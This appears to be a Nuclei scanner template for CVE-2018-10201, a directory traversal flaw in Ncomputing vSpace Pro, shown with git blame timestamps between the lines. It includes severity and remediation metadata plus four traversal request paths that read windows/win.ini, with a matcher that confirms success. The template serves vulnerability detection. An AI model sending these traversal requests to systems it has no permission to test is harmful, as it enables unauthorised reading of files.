2021-11-24 13:21:05 +00:00
|
|
|
id: CVE-2018-10201
|
|
|
|
|
|
|
|
info:
|
2022-04-29 19:58:07 +00:00
|
|
|
name: Ncomputing vSPace Pro 10 and 11 - Directory Traversal
|
2021-11-24 13:21:05 +00:00
|
|
|
author: 0x_akoko
|
|
|
|
severity: high
|
|
|
|
description: Ncomputing vSpace Pro versions 10 and 11 suffer from a directory traversal vulnerability.
|
2023-09-27 15:51:13 +00:00
|
|
|
impact: |
|
|
|
|
Successful exploitation of this vulnerability allows an attacker to read arbitrary files from the target system.
|
2023-09-06 12:57:14 +00:00
|
|
|
remediation: |
|
|
|
|
Apply the latest security patches or updates provided by Ncomputing to fix the directory traversal vulnerability.
|
2021-11-24 13:21:05 +00:00
|
|
|
reference:
|
|
|
|
- https://packetstormsecurity.com/files/147303/Ncomputing-vSPace-Pro-10-11-Directory-Traversal.html
|
2023-03-02 22:00:10 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-10201
|
2022-05-17 09:18:12 +00:00
|
|
|
- http://www.kwell.net/kwell_blog/?p=5199
|
|
|
|
- https://www.kwell.net/kwell/index.php?option=com_newsfeeds&view=newsfeed&id=15&Itemid=173&lang=es
|
2023-07-11 19:49:27 +00:00
|
|
|
- https://support.ncomputing.com/portal/kb/articles/ncomputing-health-monitor-server-vulnerability-patch
|
2021-11-24 13:21:05 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cve-id: CVE-2018-10201
|
|
|
|
cwe-id: CWE-22
|
2023-10-14 11:27:55 +00:00
|
|
|
epss-score: 0.04525
|
2023-12-12 11:07:52 +00:00
|
|
|
epss-percentile: 0.91583
|
2023-09-06 12:57:14 +00:00
|
|
|
cpe: cpe:2.3:a:ncomputing:vspace_pro:10:*:*:*:*:*:*:*
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 4
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: ncomputing
|
|
|
|
product: vspace_pro
|
|
|
|
tags: cve2018,ncomputing,lfi,packetstorm,cve
|
2021-11-26 16:55:58 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-11-24 13:21:05 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
2021-11-26 16:55:58 +00:00
|
|
|
- '{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini'
|
|
|
|
- '{{BaseURL}}/...\...\...\...\...\...\...\...\...\windows\win.ini'
|
|
|
|
- '{{BaseURL}}/..../..../..../..../..../..../..../..../..../windows/win.ini'
|
|
|
|
- '{{BaseURL}}/....\....\....\....\....\....\....\....\....\windows\win.ini'
|
2021-11-24 13:21:05 +00:00
|
|
|
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2021-11-26 16:55:58 +00:00
|
|
|
part: body
|
2021-11-24 13:21:05 +00:00
|
|
|
words:
|
|
|
|
- "bit app support"
|
|
|
|
- "fonts"
|
|
|
|
- "extensions"
|
|
|
|
condition: and
|
2023-12-29 09:30:44 +00:00
|
|
|
# digest: 4a0a0047304502207bef5efa8ba61c5a90904662c1339b7a82a553d40a795b1ed42a79e0cd2ce78d022100a2b0fb19f6b71ce233558b6490c85c83337e0272ba51205fd9de55b7fd56d71e:922c64590222798bb761d5b6d8e72950
|